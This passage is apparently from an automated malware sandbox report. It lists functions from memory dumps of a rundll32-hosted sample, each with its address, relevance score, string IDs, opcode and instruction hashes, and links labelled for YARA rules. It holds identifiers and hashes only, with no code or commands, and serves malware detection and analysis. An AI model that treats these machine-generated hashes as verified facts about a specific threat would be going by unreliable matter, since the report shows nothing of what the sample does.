      • String ID: R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*R*R*$R*R*R*R*
      • API String ID: 0-1454091619
      • Opcode ID: a9f15cc1d188ee125f19b58c12d52c095bdfc1f5c537fd8291ee3be75155a9aa
      • Instruction ID: 14f9554e3e0e30288505e3784e1016c4230dd5445eb4cce26302dc7f16ccfbf4
      • Opcode Fuzzy Hash: a9f15cc1d188ee125f19b58c12d52c095bdfc1f5c537fd8291ee3be75155a9aa
      • Instruction Fuzzy Hash: 5264E67BB546114FC72CCE6DC8D12D6F3D7ABCC304B0A963E894ADB259DE74A90986C0
      Function 065E6014 Relevance: 27.3, Strings: 17, Instructions: 6097COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*
      • API String ID: 0-467962880
      • Opcode ID: db763a7a03a500db51229c764c6829f90b410a70742696e8993980de9d24f429
      • Instruction ID: 1279cd1be8368444ba7f62f158615b2dd3a6efce6f8044f6e27c70805c30c882
      • Opcode Fuzzy Hash: db763a7a03a500db51229c764c6829f90b410a70742696e8993980de9d24f429
      • Instruction Fuzzy Hash: BDA3FA7BB546114FC72CCE6DC8D12E5F3D7ABCC304B1A963E894ADB258DE74A90986C0
      Function 06602D10 Relevance: 5.0, Strings: 1, Instructions: 3732COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: _3R
      • API String ID: 0-3215782949
      • Opcode ID: 94d5da90836400ab8aadede3b777916071eae0cc3b8ab5506f416296b22fe4f1
      • Instruction ID: 5ea418df4c7e7ce8cb998d8ff0cb9c3714ff8915da3265f55d154befbd1e2fa5
      • Opcode Fuzzy Hash: 94d5da90836400ab8aadede3b777916071eae0cc3b8ab5506f416296b22fe4f1
      • Instruction Fuzzy Hash: D473BF726193818FD778CF28C9946ABB7E6BFC9310F158A6DD49AD73D0DA34A801CB41
      Function 065FE850 Relevance: 3.6, Strings: 1, Instructions: 2356COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: J3
      • API String ID: 0-3639505502
      • Opcode ID: adaf8d4c2ad76856a6a024c326bcb934c6170eb1977f265ce8abd0dbe1c4c94d
      • Instruction ID: b695d099164880e8a9d94e2ead476f2d893f3c41df50bfb460a77372db68d815
      • Opcode Fuzzy Hash: adaf8d4c2ad76856a6a024c326bcb934c6170eb1977f265ce8abd0dbe1c4c94d
      • Instruction Fuzzy Hash: 11235B71A197818FD778CF28C8457AAB7E2BFC9314F248A2DD59A8B3D4D7309541CB82
      Function 0660A7D0 Relevance: 2.5, Strings: 1, Instructions: 1271COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: &Fd
      • API String ID: 0-2012438766
      • Opcode ID: 71bd0032535f36ffafb9d7d0ced737c5cdd0397d1ba270ebfbf5d8ae4e3e9fdb
      • Instruction ID: ae846b6c209068064d6cba3f5123379bb37ad1c5b44f8e5c6eaaf08327e064a7
      • Opcode Fuzzy Hash: 71bd0032535f36ffafb9d7d0ced737c5cdd0397d1ba270ebfbf5d8ae4e3e9fdb
      • Instruction Fuzzy Hash: C1B2E4B6A143428BE368CF25C8417ABB7E3BBC4310F19CA2DD199DB394DB75E5068B41
      Function 06611DC0 Relevance: 2.1, Strings: 1, Instructions: 873COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: UR
      • API String ID: 0-2961163533
      • Opcode ID: eb1da1a81d18b2c0db5ee7bb8ba0f1368ed4d9602197ade61cd4ef450dbe4d69
      • Instruction ID: 771d2d27342ee6c6a61219b911b7998d07464e7e4a08b48a5f523e399233b6bf
      • Opcode Fuzzy Hash: eb1da1a81d18b2c0db5ee7bb8ba0f1368ed4d9602197ade61cd4ef450dbe4d69
      • Instruction Fuzzy Hash: 2742093BF0462247E72C8929CCA53A6A1869BC4314F1F433E8D5AEF7C5DD74AE5682C0
      Function 06625F50 Relevance: 1.6, Instructions: 1577COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: cbc516ca01bbeae67ef078b0b79d51edce1030356b918d11956434c4142131f8
      • Instruction ID: 4131b666db2887bdb7605bba8173f2aa97bac5b4d7c285234c30b93fa353052e
      • Opcode Fuzzy Hash: cbc516ca01bbeae67ef078b0b79d51edce1030356b918d11956434c4142131f8
      • Instruction Fuzzy Hash: 0CE2DF716187928FC774CF28C495BAABBE1BFC9300F148A5DD4999B391D731A805CF92
      Function 065FCDD0 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: M
      • API String ID: 0-3664761504
      • Opcode ID: 242e1c5ef31d1c6826240ebdb9aa63e2a3b23a189388e6465a13e594cc8f11f4
      • Instruction ID: 571291da4e1fb1f5ba448468dfa1cb4966910441141604ed3d7494accc17b748
      • Opcode Fuzzy Hash: 242e1c5ef31d1c6826240ebdb9aa63e2a3b23a189388e6465a13e594cc8f11f4
      • Instruction Fuzzy Hash: 7D7192729183618FC750CF29C880A5BF7F2BBC5314F5A8A2DE9D4AB354D671AD05CB82
      Function 06627830 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: {nHw
      • API String ID: 0-703741753
      • Opcode ID: 3e64435138e820464c92562c54993088f472573e85fa6712d1947708b6f73233
      • Instruction ID: c3c428abcaa1070aa6fe0578f86f4a220a479bf59808463bfe448377e551e2fd
      • Opcode Fuzzy Hash: 3e64435138e820464c92562c54993088f472573e85fa6712d1947708b6f73233
      • Instruction Fuzzy Hash: 0E713971A187628FD364CF28C880A5AFBE2FF89310F51895DE489DB254D735E942CF92
      Function 064D2F7C Relevance: 1.4, Strings: 1, Instructions: 149COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: Y
      • API String ID: 0-3233089245
      • Opcode ID: 494dad637a5bd96e0a485c49c58e1fb2e0d72d29a0544d53408b359d25c2742a
      • Instruction ID: 5da73f73329c68c9e3a5d1aecc710652def54a20a7b576148e514a071f18141c
      • Opcode Fuzzy Hash: 494dad637a5bd96e0a485c49c58e1fb2e0d72d29a0544d53408b359d25c2742a
      • Instruction Fuzzy Hash: 0D512A76A093418FC361CF29C84465AF7E2BFC9310F2A895AD5989B324D771F846CF92
      Function 064D49DC Relevance: .9, Instructions: 910COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 355f62c6d735e4409b15420556f66f6b3b569728babf00da4a28d8c8a70f60ed
      • Instruction ID: 985c24a0be5450cbbab3300bcff83eb312cff7cef67df6d1ac47a2ec2ca58630
      • Opcode Fuzzy Hash: 355f62c6d735e4409b15420556f66f6b3b569728babf00da4a28d8c8a70f60ed
      • Instruction Fuzzy Hash: EE922671A08382CFC775CF28C494AAAB7E2FFC9314F15895ED4899B354DB30A945CB92
      Function 064D371C Relevance: .8, Instructions: 760COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d08f19c12bafe882d78af6bd64337f5c8d8bfcb9421296685722afde8f3d54a6
      • Instruction ID: 6f1945b178940c61f5e917d4090051e2ba11c15ab0be9cc80fd9828646b4a954
      • Opcode Fuzzy Hash: d08f19c12bafe882d78af6bd64337f5c8d8bfcb9421296685722afde8f3d54a6
      • Instruction Fuzzy Hash: E8721732A18391CFC7B6CF28C594BDBB7E5BB86310F11895AD489DB244D730AA45CB92
      Function 04D3252C Relevance: .7, Instructions: 718COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d9b59bd741db5b09ce43bc3855f9bd44c47a70fbd0f35199f51c2301bd7a2a61
      • Instruction ID: 220665c75c3ed9d8df99db31cda20ca7468f4897878413db35291cb4c2387e09
      • Opcode Fuzzy Hash: d9b59bd741db5b09ce43bc3855f9bd44c47a70fbd0f35199f51c2301bd7a2a61
      • Instruction Fuzzy Hash: 9F62E3316093828FC736CF28C5C4ADAB7E5BB89311F158DADE4898B254D770BA858B52
      Function 0660DE70 Relevance: .4, Instructions: 416COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: aa6352fe443911e79534d683ccea98d8e6dee4545254d63dece2d98971dd5f08
      • Instruction ID: 684cc704b3dbf65164b31035107a5c21481f564a230d586628fb9e7f2bd6d118
      • Opcode Fuzzy Hash: aa6352fe443911e79534d683ccea98d8e6dee4545254d63dece2d98971dd5f08
      • Instruction Fuzzy Hash: FAF1C476B187018FD71CCF29C9D166AF7E3BBC8310F099A3ED48687794DA34A905CA85
      Function 04D31698 Relevance: .4, Instructions: 377COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 65fce35a091bc19fbba94d65225c5b6ce43b5b5c68155aaa240daa101c811318
      • Instruction ID: 6365781dfd680f3f8b06ca370d40cc063b799ddc30b94e19beac4d3e3c12b602
      • Opcode Fuzzy Hash: 65fce35a091bc19fbba94d65225c5b6ce43b5b5c68155aaa240daa101c811318
      • Instruction Fuzzy Hash: 9EF1D471608382CFCB39CF14C5A0AEEB7A2BFC9315F59895DD48A4B284DB70B845CB52
      Function 06610C60 Relevance: .4, Instructions: 360COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 488e65b589beb4e67f3d8328efb9500bbbf836de6439828f8c66b62220e86f79
      • Instruction ID: ddd58b8c0e377b319b90b1b4fc563e8f21f407a015f99db06175ee542ddb2e55
      • Opcode Fuzzy Hash: 488e65b589beb4e67f3d8328efb9500bbbf836de6439828f8c66b62220e86f79
      • Instruction Fuzzy Hash: FAC11A77B046418FD718CE29C89176AF7D7BBC8310F19992ED58ACB354DE74E8068B81
      Function 06610400 Relevance: .3, Instructions: 292COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 205d9af7e80c292bd79d455ad775a8709a2a11bef403e704987442dbe1fe35fa
      • Instruction ID: c4dd164cde0f33c7ffaa8f3471ab4c0d0ce0f11f66e1809de6a968d8c7d001e7
      • Opcode Fuzzy Hash: 205d9af7e80c292bd79d455ad775a8709a2a11bef403e704987442dbe1fe35fa
      • Instruction Fuzzy Hash: CCD1F4716183828FDB74CF29C580B9AB7E2BBC9314F198D1DE199CB650D774A581CB82
      Function 065D408E Relevance: .3, Instructions: 281COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f7119f3cea1e5e38f9f6aa015c6d7bfa22593524fbcfc877daee7645a54b8f6b
      • Instruction ID: 898d90d37cd05e56b0e1fd798667ccd84f9a3cc3badf1910e9599b6d4bb3d291
      • Opcode Fuzzy Hash: f7119f3cea1e5e38f9f6aa015c6d7bfa22593524fbcfc877daee7645a54b8f6b
      • Instruction Fuzzy Hash: D791383BB545214F872CCE7DC9915A5F6D76BCC314B0ED27E884ADB398ED74A8058AC0
      Function 065FE450 Relevance: .3, Instructions: 269COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b97912f7ceb2164d5fea7a62da57f858af12a3b602e8157fadf736327b70d52f
      • Instruction ID: 30a6610c39f7ad1bfffeb985cd3833c3012c42a735f1483b0b6311bca3a73759
      • Opcode Fuzzy Hash: b97912f7ceb2164d5fea7a62da57f858af12a3b602e8157fadf736327b70d52f
      • Instruction Fuzzy Hash: 12B18E71A18391DFD764CF29D981AAAF7E1FF84310F15892EE68987360D334E845CB92
      Function 064D3334 Relevance: .2, Instructions: 243COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c2f55073d4d4b4a00a7bfc839cb92533cb18fb66c455d38ec64850cdcd8861fe
      • Instruction ID: 064e52b11893730b57f224e5283e7e537483902688259d9473f6103a4cf89d1f
      • Opcode Fuzzy Hash: c2f55073d4d4b4a00a7bfc839cb92533cb18fb66c455d38ec64850cdcd8861fe
      • Instruction Fuzzy Hash: 54B1E272A09381CFD77ACF24C5A0BAEBBE2BBC5310F15492ED58A57780DB706845CB52
      Function 06608640 Relevance: .2, Instructions: 242COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 57791ba4fa703636a29e9b042deb8d90916eb5631d2af1a11c1a6d401b67de20
      • Instruction ID: d67fac534781a0a0a1c5d365cebe2847c3cbdbd02bc011c1945772345f943bc9
      • Opcode Fuzzy Hash: 57791ba4fa703636a29e9b042deb8d90916eb5631d2af1a11c1a6d401b67de20
      • Instruction Fuzzy Hash: 01A13A71A082818FD768CF18C580BAFB7E3BFC5310F158A2DD5995B399D730A846CB92
      Function 066255F0 Relevance: .2, Instructions: 240COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 82b4ce497332e4f3ce1fde20faec48073117c2e341840e822832d87dc79f2e07
      • Instruction ID: 8474845e08e097dc77405f57ba90fab7b0b5b416be361387e150b795f4a3d048
      • Opcode Fuzzy Hash: 82b4ce497332e4f3ce1fde20faec48073117c2e341840e822832d87dc79f2e07
      • Instruction Fuzzy Hash: 24A13C31A597518FE374CF15C990B6BB7A3BFC5305F24CA2DD58A0B258C774A806CB92
      Function 0660D4C0 Relevance: .2, Instructions: 238COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: eb3c2d2f6fd0744f33eae13391b17db1a497e870171dc2d8f90fe8dd38b98f64
      • Instruction ID: 9046f0e76d0a121b0e0d0da251cf547b79ab9beb5807ce480e44494131375b41
      • Opcode Fuzzy Hash: eb3c2d2f6fd0744f33eae13391b17db1a497e870171dc2d8f90fe8dd38b98f64
      • Instruction Fuzzy Hash: 7BA16E366082518FE768DF64C580BABB7E2FFC4314F518A2DD899DB285D770E841CB92
      Function 064D18AC Relevance: .2, Instructions: 234COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 742a2af83fde4a61208e0cc889197b8d2783517953528e9d25257f4ce3641b91
      • Instruction ID: 55b5683117be96d489db221394e6628f306262531d92d925bd78afb392e7e540
      • Opcode Fuzzy Hash: 742a2af83fde4a61208e0cc889197b8d2783517953528e9d25257f4ce3641b91
      • Instruction Fuzzy Hash: 57B1E271A08391CFC779CF14C1A0BAEF7E2BB98710F16892ED99A67350D7306845CB92
      Function 04D34094 Relevance: .2, Instructions: 225COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2414d43e287a32ff3e9c598003533e5bdddead11bf7a184911e7305c1433411c
      • Instruction ID: 42af807fe660bb61cb5228b06fb5ee77684e645e60d81bcde3fe9da028e09ccf
      • Opcode Fuzzy Hash: 2414d43e287a32ff3e9c598003533e5bdddead11bf7a184911e7305c1433411c
      • Instruction Fuzzy Hash: 30B1E176A083918FCB39CF14C190BAEB7E1BF98311F11892DD9DA27644DB747845CB92
      Function 0660A160 Relevance: .2, Instructions: 224COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 4d1402daf8191c2404c3d1aa372133b264ae9bcbdc70fb84d5f937d6f0012d6d
      • Instruction ID: 8dee5b35dc266d9e15a5ea63908837ffeaa6f25f3a7074acd899793127ae635b
      • Opcode Fuzzy Hash: 4d1402daf8191c2404c3d1aa372133b264ae9bcbdc70fb84d5f937d6f0012d6d
      • Instruction Fuzzy Hash: 2DA13931A583828FE779CF54C5C0BAFB7A2BBC5340F148A2DD5C55728AD730A8468BD2
      Function 04E57410 Relevance: .2, Instructions: 223COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1e772a36589d9a647609bb58d0ebdfd566c6d589dc0cd55b32a80c02ff4c2ee6
      • Instruction ID: a9b1a360af3c32b19537457317ce26ad69df63566c0d9decbbfe33a67328ccca
      • Opcode Fuzzy Hash: 1e772a36589d9a647609bb58d0ebdfd566c6d589dc0cd55b32a80c02ff4c2ee6
      • Instruction Fuzzy Hash: 81A1E471608381CFD724CF18C980BAABBE2BB84314F55892DE989DB365D770F8558B62
      Function 0660FB40 Relevance: .2, Instructions: 210COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ca4afc87a82569400eafadb98e8e1e2e4ff44802f2f5800c7cee4552990950bd
      • Instruction ID: f76ed5a53759d0f92660de7a75bb0f09e908a017d859ae4ccb632dc0e71ce8a4
      • Opcode Fuzzy Hash: ca4afc87a82569400eafadb98e8e1e2e4ff44802f2f5800c7cee4552990950bd
      • Instruction Fuzzy Hash: 5581B3739083608FD324CF24C84055BF7E2FBC8310F168A2DE995AB394D675AC06CB82
      Function 0660FE30 Relevance: .2, Instructions: 194COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6113fc816526c83596422f04f84afdefe6ba3b9ce3f17c25b5208e9331c82878
      • Instruction ID: 291416ea1f577e4cdc1012db99c4d21016ec9d54118f04dc0bf687445a52518a
      • Opcode Fuzzy Hash: 6113fc816526c83596422f04f84afdefe6ba3b9ce3f17c25b5208e9331c82878
      • Instruction Fuzzy Hash: DB71C772A187108BD758CE24D890A6FB7E7BBD5300F158A2DE9D597384E635A805CBC1
      Function 065D1000 Relevance: .2, Instructions: 185COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8e52a20375883d495ddd89b764faee532e31b81173f62a405c1107a4294f1c39
      • Instruction ID: 877f30f73464a7570a52c100ff4578a6ec01fa52ca013d9dfd0a4580a65791ab
      • Opcode Fuzzy Hash: 8e52a20375883d495ddd89b764faee532e31b81173f62a405c1107a4294f1c39
      • Instruction Fuzzy Hash: AF61B232A08A019FD724CF29C88065BB7E3FBD8314F258A2DE59597394DB31F806CB81
      Function 066109D0 Relevance: .2, Instructions: 184COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: cf8d08c97e1ca6e7df2555279857dedb5b308484d399e442e8afb36f86954a87
      • Instruction ID: 90792f2aad78551cd7bec599fbc6ce3f276f021f222954ea9f9acbec6d336cba
      • Opcode Fuzzy Hash: cf8d08c97e1ca6e7df2555279857dedb5b308484d399e442e8afb36f86954a87
      • Instruction Fuzzy Hash: 41716C316083818FDB60CF29C991B5BBBE2BFC5314F198A18E594CB395DB30E885CB52
      Function 0660C130 Relevance: .2, Instructions: 174COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5a0844c31b02a23a8198440acf42ade140c4ad9456d2f259d07d1ee3ea645849
      • Instruction ID: 660ff910d7c75a329a77ee8667f482b61164633642b8f00b5444dd2aa3ceac3b
      • Opcode Fuzzy Hash: 5a0844c31b02a23a8198440acf42ade140c4ad9456d2f259d07d1ee3ea645849
      • Instruction Fuzzy Hash: 09714971A183518FD768CF68C880B5BB7F1BF89320F158A2DE898D7795D734E8448B92
      Function 06622640 Relevance: .2, Instructions: 164COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ae710dcb7ec85a72f43ff532ae2ef2ce4d0bc3f6fd492ed3a2eb70d14c4eec96
      • Instruction ID: c5a206dfbe4f0b38312d3686f6364bd743f3d3039cecac15a040ee0ec331a765
      • Opcode Fuzzy Hash: ae710dcb7ec85a72f43ff532ae2ef2ce4d0bc3f6fd492ed3a2eb70d14c4eec96
      • Instruction Fuzzy Hash: F5711435A087528FD364CF28C590A5ABBE2BBC8700F148A1DE599DB354CB34E949CF92
      Function 04E51240 Relevance: .1, Instructions: 148COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6c9072b87953168b5e62023a7992c03c23b7768ae1ff9504dfe0edbb8b67bddc
      • Instruction ID: 5b5c18a4d203de61229016b13eef2c2ea10f78cab7fc9663e91327ffff4508ac
      • Opcode Fuzzy Hash: 6c9072b87953168b5e62023a7992c03c23b7768ae1ff9504dfe0edbb8b67bddc
      • Instruction Fuzzy Hash: 4C519D36A083458FC710CF29D480A6AF7E6FBC9314F164959E9969B360E734F906CB91
      Function 064D5AE0 Relevance: .1, Instructions: 146COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7b65959f39060446ebc83eb71a341c719c49bfa59247352b208b80e4460ba291
      • Instruction ID: 92191cbf84c9c5c16a319910cafccc3863e622078f13a42b381a25892c79bc4a
      • Opcode Fuzzy Hash: 7b65959f39060446ebc83eb71a341c719c49bfa59247352b208b80e4460ba291
